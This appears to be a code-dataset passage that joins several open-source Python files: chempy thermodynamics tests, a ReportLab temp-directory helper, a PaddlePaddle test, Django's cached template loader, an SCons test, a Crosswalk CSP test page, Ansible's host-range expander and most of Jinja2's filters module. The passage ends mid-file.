def _gibbs(args, T, R, backend):
H, S, Cp, Tref = args
H2 = H + Cp*(T - Tref)
S2 = S + Cp*backend.log(T/Tref)
return backend.exp(-(H2 - T*S2)/(R*T))
def test_custom_gibbs():
R, T = 8.314, 298.15
dH, dS = -4e3, 16
MyGibbs = MassActionEq.from_callback(_gibbs, parameter_keys=('temperature', 'R'),
argument_names=('H', 'S', 'Cp', 'Tref'))
dCp = 123.45
Tref = 242
gee2 = MyGibbs([dH, dS, dCp, Tref])
dH2 = dH + dCp*(T - Tref)
dS2 = dS + dCp*math.log(T/Tref)
ref2 = math.exp(-(dH2 - T*dS2)/(R*T))
assert abs((gee2.eq_const({'temperature': T, 'R': R}) - ref2)/ref2) < 1e-14
def test_GibbsEqConst__unique_keys():
R, T = 8.314, 298.15
dH, dS = -4e3, 16
gee = GibbsEqConst(unique_keys=('dH1', 'dS1'))
ref = math.exp(-(dH - T*dS)/(R*T))
assert abs((gee.eq_const({'temperature': T, 'dH1': dH/R, 'dS1': dS/R}) - ref)/ref) < 1e-14
@requires('sympy')
def test_GibbsEqConst__latex():
import sympy
DH, DS, R, T = sympy.symbols(r'\Delta\ H \Delta\ S R T')
gee = GibbsEqConst([DH/R, DS/R])
res = gee.eq_const({'temperature': T}, backend=sympy)
ref = sympy.exp(-(DH - T*DS)/(R*T))
assert (res - ref).simplify() == 0
@requires(units_library)
def test_GibbsEqConst__units():
R, T = dc.molar_gas_constant, 298.15*du.K
DH = -4e3 * du.J/du.mol
DS = 16 * du.J/du.K/du.mol
be = Backend()
gee = GibbsEqConst([DH/R, DS/R])
res = gee.eq_const({'temperature': T}, backend=be)
ref = be.exp(-(DH - T*DS)/(R*T))
assert allclose(res, ref)
@requires(units_library)
def test_GibbsEqConst__nested():
class TExpr(Expr):
argument_names = ('heat_capacity',)
parameter_keys = ('energy',)
def __call__(self, variables, backend=None):
heat_capacity, = self.all_args(variables, backend=backend)
energy, = self.all_params(variables, backend=backend)
return energy/heat_capacity
R = 8.314 * du.J/du.K/du.mol
T = TExpr([10.0 * du.J/du.K])
dH, dS = -4e3 * du.J/du.mol, 16 * du.J/du.K/du.mol
gee = GibbsEqConst([dH/R, dS/R])
be = Backend()
Tref = 298.15 * du.K
ref = be.exp(-(dH - Tref*dS)/(R*Tref))
assert be.abs((gee.eq_const({'energy': 2981.5 * du.J, 'temperature': T}, backend=be) - ref)/ref) < 1e-14
| bsd-2-clause |
nakagami/reportlab | src/reportlab/lib/rltempfile.py | 1 | 1174 | #Copyright ReportLab Europe Ltd. 2000-2012
#see license.txt for license details
# $URI:$
__version__=''' $Id: rltempfile.py 3959 2012-09-27 14:39:39Z robin $ '''
__doc__='''Helper for the test suite - determines where to write output.
When our test suite runs as source, a script "test_foo.py" will typically
create "test_foo.pdf" alongside it. But if you are testing a package of
compiled code inside a zip archive, this won't work. This determines
where to write test suite output, creating a subdirectory of /tmp/ or
whatever if needed.
'''
_rl_tempdir=None
__all__ = ('get_rl_tempdir', 'get_rl_tempdir')
import os, tempfile
def _rl_getuid():
if hasattr(os,'getuid'):
return os.getuid()
else:
return ''
def get_rl_tempdir(*subdirs):
global _rl_tempdir
if _rl_tempdir is None:
_rl_tempdir = os.path.join(tempfile.gettempdir(),'ReportLab_tmp%s' % str(_rl_getuid()))
d = _rl_tempdir
if subdirs: d = os.path.join(*((d,)+subdirs))
try:
os.makedirs(d)
except:
pass
return d
def get_rl_tempfile(fn=None):
if not fn:
fn = tempfile.mktemp()
return os.path.join(get_rl_tempdir(),fn)
| bsd-3-clause |
pkuyym/Paddle | python/paddle/fluid/tests/unittests/test_const_value.py | 4 | 1041 | # Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import paddle.fluid.framework as framework
class ConditionalBlock(unittest.TestCase):
def test_const_value(self):
self.assertEqual(framework.GRAD_VAR_SUFFIX, "@GRAD")
self.assertEqual(framework.TEMP_VAR_NAME, "@TEMP@")
self.assertEqual(framework.GRAD_VAR_SUFFIX, "@GRAD")
self.assertEqual(framework.ZERO_VAR_SUFFIX, "@ZERO")
if __name__ == '__main__':
unittest.main()
| apache-2.0 |
cubicova17/annet | venv/lib/python2.7/site-packages/django/template/loaders/cached.py | 114 | 2619 | """
Wrapper class that takes a list of template loaders as an argument and attempts
to load templates from them in order, caching the result.
"""
import hashlib
from django.template.base import TemplateDoesNotExist
from django.template.loader import BaseLoader, get_template_from_string, find_template_loader, make_origin
from django.utils.encoding import force_bytes
class Loader(BaseLoader):
is_usable = True
def __init__(self, loaders):
self.template_cache = {}
self._loaders = loaders
self._cached_loaders = []
@property
def loaders(self):
# Resolve loaders on demand to avoid circular imports
if not self._cached_loaders:
# Set self._cached_loaders atomically. Otherwise, another thread
# could see an incomplete list. See #17303.
cached_loaders = []
for loader in self._loaders:
cached_loaders.append(find_template_loader(loader))
self._cached_loaders = cached_loaders
return self._cached_loaders
def find_template(self, name, dirs=None):
for loader in self.loaders:
try:
template, display_name = loader(name, dirs)
return (template, make_origin(display_name, loader, name, dirs))
except TemplateDoesNotExist:
pass
raise TemplateDoesNotExist(name)
def load_template(self, template_name, template_dirs=None):
key = template_name
if template_dirs:
# If template directories were specified, use a hash to differentiate
key = '-'.join([template_name, hashlib.sha1(force_bytes('|'.join(template_dirs))).hexdigest()])
try:
template = self.template_cache[key]
except KeyError:
template, origin = self.find_template(template_name, template_dirs)
if not hasattr(template, 'render'):
try:
template = get_template_from_string(template, origin, template_name)
except TemplateDoesNotExist:
# If compiling the template we found raises TemplateDoesNotExist,
# back off to returning the source and display name for the template
# we were asked to load. This allows for correct identification (later)
# of the actual template that does not exist.
return template, origin
self.template_cache[key] = template
return template, None
def reset(self):
"Empty the template cache."
self.template_cache.clear()
| mit |
datalogics-robb/scons | test/Java/JARCOM.py | 2 | 2024 | #!/usr/bin/env python
#
# __COPYRIGHT__
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "__FILE__ __REVISION__ __DATE__ __DEVELOPER__"
"""
Test the ability to configure the $JARCOM construction variable.
"""
import TestSCons
_python_ = TestSCons._python_
test = TestSCons.TestSCons()
test.write('myjar.py', r"""
import sys
outfile = open(sys.argv[1], 'wb')
for f in sys.argv[2:]:
infile = open(f, 'rb')
for l in filter(lambda l: l != '/*jar*/\n', infile.readlines()):
outfile.write(l)
sys.exit(0)
""")
test.write('SConstruct', """
env = Environment(TOOLS = ['default', 'jar'],
JARCOM = r'%(_python_)s myjar.py $TARGET $SOURCES')
env.Jar(target = 'test1', source = ['file1.in', 'file2.in', 'file3.in'])
""" % locals())
test.write('file1.in', "file1.in\n/*jar*/\n")
test.write('file2.in', "file2.in\n/*jar*/\n")
test.write('file3.in', "file3.in\n/*jar*/\n")
test.run()
test.must_match('test1.jar', "file1.in\nfile2.in\nfile3.in\n")
test.pass_test()
| mit |
kaixinjxq/crosswalk-test-suite | webapi/tct-csp-w3c-tests/csp-py/csp_default-src_cross-origin_multi_font_allowed_two-manual.py | 25 | 2623 | def main(request, response):
_URL = request.url
_CSP = "default-src http://www.tizen.com " + \
_URL[:_URL.index('/csp') + 1] + "; style-src 'unsafe-inline'"
_CSSURL = _URL[:_URL.index('/csp') + 1] + "csp/support/w3c/CanvasTest.ttf"
print _CSSURL
response.headers.set("Content-Security-Policy", _CSP)
response.headers.set("X-Content-Security-Policy", _CSP)
response.headers.set("X-WebKit-CSP", _CSP)
return """<!DOCTYPE html>
<!--
Copyright (c) 2013 Intel Corporation.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
* Redistributions of works must retain the original copyright notice, this list
of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the original copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* Neither the name of Intel Corporation nor the names of its contributors
may be used to endorse or promote products derived from this work without
specific prior written permission.
THIS SOFTWARE IS PROVIDED BY INTEL CORPORATION "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL INTEL CORPORATION BE LIABLE FOR ANY DIRECT,
INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY
OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
Authors:
Hao, Yunfei <yunfeix.hao@intel.com>
-->
<html>
<head>
<title>CSP Test: csp_default-src_cross-origin_multi_font_allowed_two</title>
<link rel="author" title="Intel" href="http://www.intel.com"/>
<link rel="help" href="http://www.w3.org/TR/2012/CR-CSP-20121115/#default-src"/>
<meta name="flags" content=""/>
<meta charset="utf-8"/>
<style>
@font-face {
font-family: Canvas;
src: url(""" + _CSSURL + """);
}
#test {
font-family: Canvas;
}
</style>
</head>
<body>
<p>Test passes if the two lines are different in font</p>
<div id="test">1234 ABCD</div>
<div>1234 ABCD</div>
</body>
</html> """
| bsd-3-clause |
gtaylor/ansible | v2/ansible/inventory/expand_hosts.py | 71 | 4415 | # (c) 2012, Zettar Inc.
# Written by Chin Fang <fangchin@zettar.com>
#
# This file is part of Ansible
#
# This module is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This software is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this software. If not, see <http://www.gnu.org/licenses/>.
#
'''
This module is for enhancing ansible's inventory parsing capability such
that it can deal with hostnames specified using a simple pattern in the
form of [beg:end], example: [1:5], [a:c], [D:G]. If beg is not specified,
it defaults to 0.
If beg is given and is left-zero-padded, e.g. '001', it is taken as a
formatting hint when the range is expanded. e.g. [001:010] is to be
expanded into 001, 002 ...009, 010.
Note that when beg is specified with left zero padding, then the length of
end must be the same as that of beg, else an exception is raised.
'''
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import string
from ansible import errors
def detect_range(line = None):
'''
A helper function that checks a given host line to see if it contains
a range pattern described in the docstring above.
Returnes True if the given line contains a pattern, else False.
'''
if 0 <= line.find("[") < line.find(":") < line.find("]"):
return True
else:
return False
def expand_hostname_range(line = None):
'''
A helper function that expands a given line that contains a pattern
specified in top docstring, and returns a list that consists of the
expanded version.
The '[' and ']' characters are used to maintain the pseudo-code
appearance. They are replaced in this function with '|' to ease
string splitting.
References: http://ansible.github.com/patterns.html#hosts-and-groups
'''
all_hosts = []
if line:
# A hostname such as db[1:6]-node is considered to consists
# three parts:
# head: 'db'
# nrange: [1:6]; range() is a built-in. Can't use the name
# tail: '-node'
# Add support for multiple ranges in a host so:
# db[01:10:3]node-[01:10]
# - to do this we split off at the first [...] set, getting the list
# of hosts and then repeat until none left.
# - also add an optional third parameter which contains the step. (Default: 1)
# so range can be [01:10:2] -> 01 03 05 07 09
# FIXME: make this work for alphabetic sequences too.
(head, nrange, tail) = line.replace('[','|',1).replace(']','|',1).split('|')
bounds = nrange.split(":")
if len(bounds) != 2 and len(bounds) != 3:
raise errors.AnsibleError("host range incorrectly specified")
beg = bounds[0]
end = bounds[1]
if len(bounds) == 2:
step = 1
else:
step = bounds[2]
if not beg:
beg = "0"
if not end:
raise errors.AnsibleError("host range end value missing")
if beg[0] == '0' and len(beg) > 1:
rlen = len(beg) # range length formatting hint
if rlen != len(end):
raise errors.AnsibleError("host range format incorrectly specified!")
fill = lambda _: str(_).zfill(rlen) # range sequence
else:
fill = str
try:
i_beg = string.ascii_letters.index(beg)
i_end = string.ascii_letters.index(end)
if i_beg > i_end:
raise errors.AnsibleError("host range format incorrectly specified!")
seq = string.ascii_letters[i_beg:i_end+1]
except ValueError: # not an alpha range
seq = range(int(beg), int(end)+1, int(step))
for rseq in seq:
hname = ''.join((head, fill(rseq), tail))
if detect_range(hname):
all_hosts.extend( expand_hostname_range( hname ) )
else:
all_hosts.append(hname)
return all_hosts
| gpl-3.0 |
michaelgugino/turbo-lister | jinja2/filters.py | 5 | 30154 | # -*- coding: utf-8 -*-
"""
jinja2.filters
~~~~~~~~~~~~~~
Bundled jinja filters.
:copyright: (c) 2010 by the Jinja Team.
:license: BSD, see LICENSE for more details.
"""
import re
import math
from random import choice
from operator import itemgetter
from itertools import groupby
from jinja2.utils import Markup, escape, pformat, urlize, soft_unicode, \
unicode_urlencode
from jinja2.runtime import Undefined
from jinja2.exceptions import FilterArgumentError
from jinja2._compat import imap, string_types, text_type, iteritems
_word_re = re.compile(r'\w+(?u)')
def contextfilter(f):
"""Decorator for marking context dependent filters. The current
:class:`Context` will be passed as first argument.
"""
f.contextfilter = True
return f
def evalcontextfilter(f):
"""Decorator for marking eval-context dependent filters. An eval
context object is passed as first argument. For more information
about the eval context, see :ref:`eval-context`.
.. versionadded:: 2.4
"""
f.evalcontextfilter = True
return f
def environmentfilter(f):
"""Decorator for marking evironment dependent filters. The current
:class:`Environment` is passed to the filter as first argument.
"""
f.environmentfilter = True
return f
def make_attrgetter(environment, attribute):
"""Returns a callable that looks up the given attribute from a
passed object with the rules of the environment. Dots are allowed
to access attributes of attributes. Integer parts in paths are
looked up as integers.
"""
if not isinstance(attribute, string_types) \
or ('.' not in attribute and not attribute.isdigit()):
return lambda x: environment.getitem(x, attribute)
attribute = attribute.split('.')
def attrgetter(item):
for part in attribute:
if part.isdigit():
part = int(part)
item = environment.getitem(item, part)
return item
return attrgetter
def do_forceescape(value):
"""Enforce HTML escaping. This will probably double escape variables."""
if hasattr(value, '__html__'):
value = value.__html__()
return escape(text_type(value))
def do_urlencode(value):
"""Escape strings for use in URLs (uses UTF-8 encoding). It accepts both
dictionaries and regular strings as well as pairwise iterables.
.. versionadded:: 2.7
"""
itemiter = None
if isinstance(value, dict):
itemiter = iteritems(value)
elif not isinstance(value, string_types):
try:
itemiter = iter(value)
except TypeError:
pass
if itemiter is None:
return unicode_urlencode(value)
return u'&'.join(unicode_urlencode(k) + '=' +
unicode_urlencode(v) for k, v in itemiter)
@evalcontextfilter
def do_replace(eval_ctx, s, old, new, count=None):
"""Return a copy of the value with all occurrences of a substring
replaced with a new one. The first argument is the substring
that should be replaced, the second is the replacement string.
If the optional third argument ``count`` is given, only the first
``count`` occurrences are replaced:
.. sourcecode:: jinja
{{ "Hello World"|replace("Hello", "Goodbye") }}
-> Goodbye World
{{ "aaaaargh"|replace("a", "d'oh, ", 2) }}
-> d'oh, d'oh, aaargh
"""
if count is None:
count = -1
if not eval_ctx.autoescape:
return text_type(s).replace(text_type(old), text_type(new), count)
if hasattr(old, '__html__') or hasattr(new, '__html__') and \
not hasattr(s, '__html__'):
s = escape(s)
else:
s = soft_unicode(s)
return s.replace(soft_unicode(old), soft_unicode(new), count)
def do_upper(s):
"""Convert a value to uppercase."""
return soft_unicode(s).upper()
def do_lower(s):
"""Convert a value to lowercase."""
return soft_unicode(s).lower()
@evalcontextfilter
def do_xmlattr(_eval_ctx, d, autospace=True):
"""Create an SGML/XML attribute string based on the items in a dict.
All values that are neither `none` nor `undefined` are automatically
escaped:
.. sourcecode:: html+jinja
<ul{{ {'class': 'my_list', 'missing': none,
'id': 'list-%d'|format(variable)}|xmlattr }}>
...
</ul>
Results in something like this:
.. sourcecode:: html
<ul class="my_list" id="list-42">
...
</ul>
As you can see it automatically prepends a space in front of the item
if the filter returned something unless the second parameter is false.
"""
rv = u' '.join(
u'%s="%s"' % (escape(key), escape(value))
for key, value in iteritems(d)
if value is not None and not isinstance(value, Undefined)
)
if autospace and rv:
rv = u' ' + rv
if _eval_ctx.autoescape:
rv = Markup(rv)
return rv
def do_capitalize(s):
"""Capitalize a value. The first character will be uppercase, all others
lowercase.
"""
return soft_unicode(s).capitalize()
def do_title(s):
"""Return a titlecased version of the value. I.e. words will start with
uppercase letters, all remaining characters are lowercase.
"""
rv = []
for item in re.compile(r'([-\s]+)(?u)').split(soft_unicode(s)):
if not item:
continue
rv.append(item[0].upper() + item[1:].lower())
return ''.join(rv)
def do_dictsort(value, case_sensitive=False, by='key'):
"""Sort a dict and yield (key, value) pairs. Because python dicts are
unsorted you may want to use this function to order them by either
key or value:
.. sourcecode:: jinja
{% for item in mydict|dictsort %}
sort the dict by key, case insensitive
{% for item in mydict|dictsort(true) %}
sort the dict by key, case sensitive
{% for item in mydict|dictsort(false, 'value') %}
sort the dict by key, case insensitive, sorted
normally and ordered by value.
"""
if by == 'key':
pos = 0
elif by == 'value':
pos = 1
else:
raise FilterArgumentError('You can only sort by either '
'"key" or "value"')
def sort_func(item):
value = item[pos]
if isinstance(value, string_types) and not case_sensitive:
value = value.lower()
return value
return sorted(value.items(), key=sort_func)
@environmentfilter
def do_sort(environment, value, reverse=False, case_sensitive=False,
attribute=None):
"""Sort an iterable. Per default it sorts ascending, if you pass it
true as first argument it will reverse the sorting.
If the iterable is made of strings the third parameter can be used to
control the case sensitiveness of the comparison which is disabled by
default.
.. sourcecode:: jinja
{% for item in iterable|sort %}
...
{% endfor %}
It is also possible to sort by an attribute (for example to sort
by the date of an object) by specifying the `attribute` parameter:
.. sourcecode:: jinja
{% for item in iterable|sort(attribute='date') %}
...
{% endfor %}
.. versionchanged:: 2.6
The `attribute` parameter was added.
"""
if not case_sensitive:
def sort_func(item):
if isinstance(item, string_types):
item = item.lower()
return item
else:
sort_func = None
if attribute is not None:
getter = make_attrgetter(environment, attribute)
def sort_func(item, processor=sort_func or (lambda x: x)):
return processor(getter(item))
return sorted(value, key=sort_func, reverse=reverse)
def do_default(value, default_value=u'', boolean=False):
"""If the value is undefined it will return the passed default value,
otherwise the value of the variable:
.. sourcecode:: jinja
{{ my_variable|default('my_variable is not defined') }}
This will output the value of ``my_variable`` if the variable was
defined, otherwise ``'my_variable is not defined'``. If you want
to use default with variables that evaluate to false you have to
set the second parameter to `true`:
.. sourcecode:: jinja
{{ ''|default('the string was empty', true) }}
"""
if isinstance(value, Undefined) or (boolean and not value):
return default_value
return value
@evalcontextfilter
def do_join(eval_ctx, value, d=u'', attribute=None):
"""Return a string which is the concatenation of the strings in the
sequence. The separator between elements is an empty string per
default, you can define it with the optional parameter:
.. sourcecode:: jinja
{{ [1, 2, 3]|join('|') }}
-> 1|2|3
{{ [1, 2, 3]|join }}
-> 123
It is also possible to join certain attributes of an object:
.. sourcecode:: jinja
{{ users|join(', ', attribute='username') }}
.. versionadded:: 2.6
The `attribute` parameter was added.
"""
if attribute is not None:
value = imap(make_attrgetter(eval_ctx.environment, attribute), value)
# no automatic escaping? joining is a lot eaiser then
if not eval_ctx.autoescape:
return text_type(d).join(imap(text_type, value))
# if the delimiter doesn't have an html representation we check
# if any of the items has. If yes we do a coercion to Markup
if not hasattr(d, '__html__'):
value = list(value)
do_escape = False
for idx, item in enumerate(value):
if hasattr(item, '__html__'):
do_escape = True
else:
value[idx] = text_type(item)
if do_escape:
d = escape(d)
else:
d = text_type(d)
return d.join(value)
# no html involved, to normal joining
return soft_unicode(d).join(imap(soft_unicode, value))
def do_center(value, width=80):
"""Centers the value in a field of a given width."""
return text_type(value).center(width)
@environmentfilter
def do_first(environment, seq):
"""Return the first item of a sequence."""
try:
return next(iter(seq))
except StopIteration:
return environment.undefined('No first item, sequence was empty.')
@environmentfilter
def do_last(environment, seq):
"""Return the last item of a sequence."""
try:
return next(iter(reversed(seq)))
except StopIteration:
return environment.undefined('No last item, sequence was empty.')
@environmentfilter
def do_random(environment, seq):
"""Return a random item from the sequence."""
try:
return choice(seq)
except IndexError:
return environment.undefined('No random item, sequence was empty.')
def do_filesizeformat(value, binary=False):
"""Format the value like a 'human-readable' file size (i.e. 13 kB,
4.1 MB, 102 Bytes, etc). Per default decimal prefixes are used (Mega,
Giga, etc.), if the second parameter is set to `True` the binary
prefixes are used (Mebi, Gibi).
"""
bytes = float(value)
base = binary and 1024 or 1000
prefixes = [
(binary and 'KiB' or 'kB'),
(binary and 'MiB' or 'MB'),
(binary and 'GiB' or 'GB'),
(binary and 'TiB' or 'TB'),
(binary and 'PiB' or 'PB'),
(binary and 'EiB' or 'EB'),
(binary and 'ZiB' or 'ZB'),
(binary and 'YiB' or 'YB')
]
if bytes == 1:
return '1 Byte'
elif bytes < base:
return '%d Bytes' % bytes
else:
for i, prefix in enumerate(prefixes):
unit = base ** (i + 2)
if bytes < unit:
return '%.1f %s' % ((base * bytes / unit), prefix)
return '%.1f %s' % ((base * bytes / unit), prefix)
def do_pprint(value, verbose=False):
"""Pretty print a variable. Useful for debugging.
With Jinja 1.2 onwards you can pass it a parameter. If this parameter
is truthy the output will be more verbose (this requires `pretty`)
"""
return pformat(value, verbose=verbose)
@evalcontextfilter
def do_urlize(eval_ctx, value, trim_url_limit=None, nofollow=False,
target=None):
"""Converts URLs in plain text into clickable links.
If you pass the filter an additional integer it will shorten the urls
to that number. Also a third argument exists that makes the urls
"nofollow":
.. sourcecode:: jinja
{{ mytext|urlize(40, true) }}
links are shortened to 40 chars and defined with rel="nofollow"
If *target* is specified, the ``target`` attribute will be added to the
``<a>`` tag:
.. sourcecode:: jinja
{{ mytext|urlize(40, target='_blank') }}
.. versionchanged:: 2.8+
The *target* parameter was added.
"""
rv = urlize(value, trim_url_limit, nofollow, target)
if eval_ctx.autoescape:
rv = Markup(rv)
return rv
def do_indent(s, width=4, indentfirst=False):
"""Return a copy of the passed string, each line indented by
4 spaces. The first line is not indented. If you want to
change the number of spaces or indent the first line too
you can pass additional parameters to the filter:
.. sourcecode:: jinja
{{ mytext|indent(2, true) }}
indent by two spaces and indent the first line too.
"""
indention = u' ' * width
rv = (u'\n' + indention).join(s.splitlines())
if indentfirst:
rv = indention + rv
return rv
def do_truncate(s, length=255, killwords=False, end='...'):
"""Return a truncated copy of the string. The length is specified
with the first parameter which defaults to ``255``. If the second
parameter is ``true`` the filter will cut the text at length. Otherwise
it will discard the last word. If the text was in fact
truncated it will append an ellipsis sign (``"..."``). If you want a
different ellipsis sign than ``"..."`` you can specify it using the
third parameter.
.. sourcecode:: jinja
{{ "foo bar baz"|truncate(9) }}
-> "foo ba..."
{{ "foo bar baz"|truncate(9, True) }}
-> "foo ..."
"""
if len(s) <= (length + len(end)):
return s
elif killwords:
return s[:length - len(end)] + end
words = s.split(' ')
result = []
m = 0
for word in words:
m += len(word) + 1
if m > (length - len(end)):
break
result.append(word)
result.append(end)
return u' '.join(result)
@environmentfilter
def do_wordwrap(environment, s, width=79, break_long_words=True,
wrapstring=None):
"""
Return a copy of the string passed to the filter wrapped after
``79`` characters. You can override this default using the first
parameter. If you set the second parameter to `false` Jinja will not
split words apart if they are longer than `width`. By default, the newlines
will be the default newlines for the environment, but this can be changed
using the wrapstring keyword argument.
.. versionadded:: 2.7
Added support for the `wrapstring` parameter.
"""
if not wrapstring:
wrapstring = environment.newline_sequence
import textwrap
return wrapstring.join(textwrap.wrap(s, width=width, expand_tabs=False,
replace_whitespace=False,
break_long_words=break_long_words))
def do_wordcount(s):
"""Count the words in that string."""
return len(_word_re.findall(s))
def do_int(value, default=0):
"""Convert the value into an integer. If the
conversion doesn't work it will return ``0``. You can
override this default using the first parameter.
"""
try:
return int(value)
except (TypeError, ValueError):
# this quirk is necessary so that "42.23"|int gives 42.
try:
return int(float(value))
except (TypeError, ValueError):
return default
def do_float(value, default=0.0):
"""Convert the value into a floating point number. If the
conversion doesn't work it will return ``0.0``. You can
override this default using the first parameter.
"""
try:
return float(value)
except (TypeError, ValueError):
return default
def do_format(value, *args, **kwargs):
"""
Apply python string formatting on an object:
.. sourcecode:: jinja
{{ "%s - %s"|format("Hello?", "Foo!") }}
-> Hello? - Foo!
"""
if args and kwargs:
raise FilterArgumentError('can\'t handle positional and keyword '
'arguments at the same time')
return soft_unicode(value) % (kwargs or args)
def do_trim(value):
"""Strip leading and trailing whitespace."""
return soft_unicode(value).strip()
def do_striptags(value):
"""Strip SGML/XML tags and replace adjacent whitespace by one space.
"""
if hasattr(value, '__html__'):
value = value.__html__()
return Markup(text_type(value)).striptags()
def do_slice(value, slices, fill_with=None):
"""Slice an iterator and return a list of lists containing
those items. Useful if you want to create a div containing
three ul tags that represent columns:
.. sourcecode:: html+jinja
<div class="columwrapper">
{%- for column in items|slice(3) %}
<ul class="column-{{ loop.index }}">
{%- for item in column %}
<li>{{ item }}</li>
{%- endfor %}
</ul>
{%- endfor %}
</div>
If you pass it a second argument it's used to fill missing
values on the last iteration.
"""
seq = list(value)
length = len(seq)
items_per_slice = length // slices
slices_with_extra = length % slices
offset = 0
for slice_number in range(slices):
start = offset + slice_number * items_per_slice
if slice_number < slices_with_extra:
offset += 1
end = offset + (slice_number + 1) * items_per_slice
tmp = seq[start:end]
if fill_with is not None and slice_number >= slices_with_extra:
tmp.append(fill_with)
yield tmp
def do_batch(value, linecount, fill_with=None):
"""
A filter that batches items. It works pretty much like `slice`
just the other way round. It returns a list of lists with the
given number of items. If you provide a second parameter this
is used to fill up missing items. See this example:
.. sourcecode:: html+jinja
<table>
{%- for row in items|batch(3, ' ') %}
<tr>
{%- for column in row %}
<td>{{ column }}</td>
{%- endfor %}
</tr>
{%- endfor %}
</table>
"""
result = []
tmp = []
for item in value:
if len(tmp) == linecount:
yield tmp
tmp = []
tmp.append(item)
if tmp:
if fill_with is not None and len(tmp) < linecount:
tmp += [fill_with] * (linecount - len(tmp))
yield tmp
def do_round(value, precision=0, method='common'):
"""Round the number to a given precision. The first
parameter specifies the precision (default is ``0``), the
second the rounding method:
- ``'common'`` rounds either up or down
- ``'ceil'`` always rounds up
- ``'floor'`` always rounds down
If you don't specify a method ``'common'`` is used.
.. sourcecode:: jinja
{{ 42.55|round }}
-> 43.0
{{ 42.55|round(1, 'floor') }}
-> 42.5
Note that even if rounded to 0 precision, a float is returned. If
you need a real integer, pipe it through `int`:
.. sourcecode:: jinja
{{ 42.55|round|int }}
-> 43
"""
if not method in ('common', 'ceil', 'floor'):
raise FilterArgumentError('method must be common, ceil or floor')
if method == 'common':
return round(value, precision)
func = getattr(math, method)
return func(value * (10 ** precision)) / (10 ** precision)
@environmentfilter
def do_groupby(environment, value, attribute):
"""Group a sequence of objects by a common attribute.
If you for example have a list of dicts or objects that represent persons
with `gender`, `first_name` and `last_name` attributes and you want to
group all users by genders you can do something like the following
snippet:
.. sourcecode:: html+jinja
<ul>
{% for group in persons|groupby('gender') %}
<li>{{ group.grouper }}<ul>
{% for person in group.list %}
<li>{{ person.first_name }} {{ person.last_name }}</li>
{% endfor %}</ul></li>
{% endfor %}
</ul>
Additionally it's possible to use tuple unpacking for the grouper and
list:
.. sourcecode:: html+jinja
<ul>
{% for grouper, list in persons|groupby('gender') %}
...
{% endfor %}
</ul>
As you can see the item we're grouping by is stored in the `grouper`
attribute and the `list` contains all the objects that have this grouper
in common.
.. versionchanged:: 2.6
It's now possible to use dotted notation to group by the child
attribute of another attribute.
"""
expr = make_attrgetter(environment, attribute)
return sorted(map(_GroupTuple, groupby(sorted(value, key=expr), expr)))
class _GroupTuple(tuple):
__slots__ = ()
grouper = property(itemgetter(0))
list = property(itemgetter(1))
def __new__(cls, xxx_todo_changeme):
(key, value) = xxx_todo_changeme
return tuple.__new__(cls, (key, list(value)))
@environmentfilter
def do_sum(environment, iterable, attribute=None, start=0):
"""Returns the sum of a sequence of numbers plus the value of parameter
'start' (which defaults to 0). When the sequence is empty it returns
start.
It is also possible to sum up only certain attributes:
.. sourcecode:: jinja
Total: {{ items|sum(attribute='price') }}
.. versionchanged:: 2.6
The `attribute` parameter was added to allow suming up over
attributes. Also the `start` parameter was moved on to the right.
"""
if attribute is not None:
iterable = imap(make_attrgetter(environment, attribute), iterable)
return sum(iterable, start)
def do_list(value):
"""Convert the value into a list. If it was a string the returned list
will be a list of characters.
"""
return list(value)
def do_mark_safe(value):
"""Mark the value as safe which means that in an environment with automatic
escaping enabled this variable will not be escaped.
"""
return Markup(value)
def do_mark_unsafe(value):
